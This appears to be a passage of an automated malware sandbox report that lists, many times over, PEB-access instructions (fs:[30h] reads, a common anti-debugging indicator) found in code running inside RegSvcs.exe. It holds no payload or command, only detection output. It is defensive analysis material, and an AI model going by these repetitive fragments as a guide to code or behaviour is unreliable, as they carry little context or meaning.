                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA197 mov eax, dword ptr fs:[00000030h]9_2_010DA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA197 mov eax, dword ptr fs:[00000030h]9_2_010DA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA197 mov eax, dword ptr fs:[00000030h]9_2_010DA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FB1B0 mov eax, dword ptr fs:[00000030h]9_2_010FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111D1D0 mov eax, dword ptr fs:[00000030h]9_2_0111D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111D1D0 mov ecx, dword ptr fs:[00000030h]9_2_0111D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B51CB mov eax, dword ptr fs:[00000030h]9_2_011B51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A61C3 mov eax, dword ptr fs:[00000030h]9_2_011A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A61C3 mov eax, dword ptr fs:[00000030h]9_2_011A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011871F9 mov esi, dword ptr fs:[00000030h]9_2_011871F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E51ED mov eax, dword ptr fs:[00000030h]9_2_010E51ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011101F8 mov eax, dword ptr fs:[00000030h]9_2_011101F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B61E5 mov eax, dword ptr fs:[00000030h]9_2_011B61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01164000 mov ecx, dword ptr fs:[00000030h]9_2_01164000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA020 mov eax, dword ptr fs:[00000030h]9_2_010DA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC020 mov eax, dword ptr fs:[00000030h]9_2_010DC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B052 mov eax, dword ptr fs:[00000030h]9_2_0110B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118705E mov ebx, dword ptr fs:[00000030h]9_2_0118705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118705E mov eax, dword ptr fs:[00000030h]9_2_0118705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166050 mov eax, dword ptr fs:[00000030h]9_2_01166050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2050 mov eax, dword ptr fs:[00000030h]9_2_010E2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110C073 mov eax, dword ptr fs:[00000030h]9_2_0110C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D070 mov ecx, dword ptr fs:[00000030h]9_2_0115D070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116106E mov eax, dword ptr fs:[00000030h]9_2_0116106E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5060 mov eax, dword ptr fs:[00000030h]9_2_011B5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov ecx, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DD08D mov eax, dword ptr fs:[00000030h]9_2_010DD08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110D090 mov eax, dword ptr fs:[00000030h]9_2_0110D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110D090 mov eax, dword ptr fs:[00000030h]9_2_0110D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E208A mov eax, dword ptr fs:[00000030h]9_2_010E208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111909C mov eax, dword ptr fs:[00000030h]9_2_0111909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116D080 mov eax, dword ptr fs:[00000030h]9_2_0116D080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116D080 mov eax, dword ptr fs:[00000030h]9_2_0116D080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E5096 mov eax, dword ptr fs:[00000030h]9_2_010E5096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A60B8 mov eax, dword ptr fs:[00000030h]9_2_011A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A60B8 mov ecx, dword ptr fs:[00000030h]9_2_011A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011780A8 mov eax, dword ptr fs:[00000030h]9_2_011780A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B50D9 mov eax, dword ptr fs:[00000030h]9_2_011B50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011620DE mov eax, dword ptr fs:[00000030h]9_2_011620DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011090DB mov eax, dword ptr fs:[00000030h]9_2_011090DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h] 9_2_010F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h] 9_2_010F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h] 9_2_010F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h] 9_2_010F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h] 9_2_010F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0115D0C0 mov eax, dword ptr fs:[00000030h] 9_2_0115D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0115D0C0 mov eax, dword ptr fs:[00000030h] 9_2_0115D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011220F0 mov ecx, dword ptr fs:[00000030h] 9_2_011220F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E80E9 mov eax, dword ptr fs:[00000030h] 9_2_010E80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DA0E3 mov ecx, dword ptr fs:[00000030h] 9_2_010DA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011050E4 mov eax, dword ptr fs:[00000030h] 9_2_011050E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011050E4 mov ecx, dword ptr fs:[00000030h] 9_2_011050E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011660E0 mov eax, dword ptr fs:[00000030h] 9_2_011660E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DC0F0 mov eax, dword ptr fs:[00000030h] 9_2_010DC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01100310 mov ecx, dword ptr fs:[00000030h] 9_2_01100310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111A30B mov eax, dword ptr fs:[00000030h] 9_2_0111A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111A30B mov eax, dword ptr fs:[00000030h] 9_2_0111A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111A30B mov eax, dword ptr fs:[00000030h] 9_2_0111A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DC310 mov ecx, dword ptr fs:[00000030h] 9_2_010DC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116930B mov eax, dword ptr fs:[00000030h] 9_2_0116930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116930B mov eax, dword ptr fs:[00000030h] 9_2_0116930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116930B mov eax, dword ptr fs:[00000030h] 9_2_0116930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011A132D mov eax, dword ptr fs:[00000030h] 9_2_011A132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011A132D mov eax, dword ptr fs:[00000030h] 9_2_011A132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110F32A mov eax, dword ptr fs:[00000030h] 9_2_0110F32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D7330 mov eax, dword ptr fs:[00000030h] 9_2_010D7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DD34C mov eax, dword ptr fs:[00000030h] 9_2_010DD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DD34C mov eax, dword ptr fs:[00000030h] 9_2_010DD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011AA352 mov eax, dword ptr fs:[00000030h] 9_2_011AA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116035C mov eax, dword ptr fs:[00000030h] 9_2_0116035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116035C mov eax, dword ptr fs:[00000030h] 9_2_0116035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116035C mov eax, dword ptr fs:[00000030h] 9_2_0116035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116035C mov ecx, dword ptr fs:[00000030h] 9_2_0116035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116035C mov eax, dword ptr fs:[00000030h] 9_2_0116035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116035C mov eax, dword ptr fs:[00000030h] 9_2_0116035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B5341 mov eax, dword ptr fs:[00000030h] 9_2_011B5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D9353 mov eax, dword ptr fs:[00000030h] 9_2_010D9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D9353 mov eax, dword ptr fs:[00000030h] 9_2_010D9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01162349 mov eax, dword ptr fs:[00000030h] 9_2_01162349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0118437C mov eax, dword ptr fs:[00000030h] 9_2_0118437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119F367 mov eax, dword ptr fs:[00000030h] 9_2_0119F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E7370 mov eax, dword ptr fs:[00000030h] 9_2_010E7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E7370 mov eax, dword ptr fs:[00000030h] 9_2_010E7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E7370 mov eax, dword ptr fs:[00000030h] 9_2_010E7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DE388 mov eax, dword ptr fs:[00000030h] 9_2_010DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DE388 mov eax, dword ptr fs:[00000030h] 9_2_010DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DE388 mov eax, dword ptr fs:[00000030h] 9_2_010DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B539D mov eax, dword ptr fs:[00000030h] 9_2_011B539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0113739A mov eax, dword ptr fs:[00000030h] 9_2_0113739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0113739A mov eax, dword ptr fs:[00000030h] 9_2_0113739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D8397 mov eax, dword ptr fs:[00000030h] 9_2_010D8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D8397 mov eax, dword ptr fs:[00000030h] 9_2_010D8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D8397 mov eax, dword ptr fs:[00000030h] 9_2_010D8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110438F mov eax, dword ptr fs:[00000030h] 9_2_0110438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110438F mov eax, dword ptr fs:[00000030h] 9_2_0110438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011133A0 mov eax, dword ptr fs:[00000030h] 9_2_011133A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011133A0 mov eax, dword ptr fs:[00000030h] 9_2_011133A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011033A5 mov eax, dword ptr fs:[00000030h] 9_2_011033A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119B3D0 mov ecx, dword ptr fs:[00000030h] 9_2_0119B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h] 9_2_010EA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h] 9_2_010EA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h] 9_2_010EA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h] 9_2_010EA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h] 9_2_010EA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h] 9_2_010EA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h] 9_2_010E83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h] 9_2_010E83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h] 9_2_010E83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h] 9_2_010E83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119C3CD mov eax, dword ptr fs:[00000030h] 9_2_0119C3CD
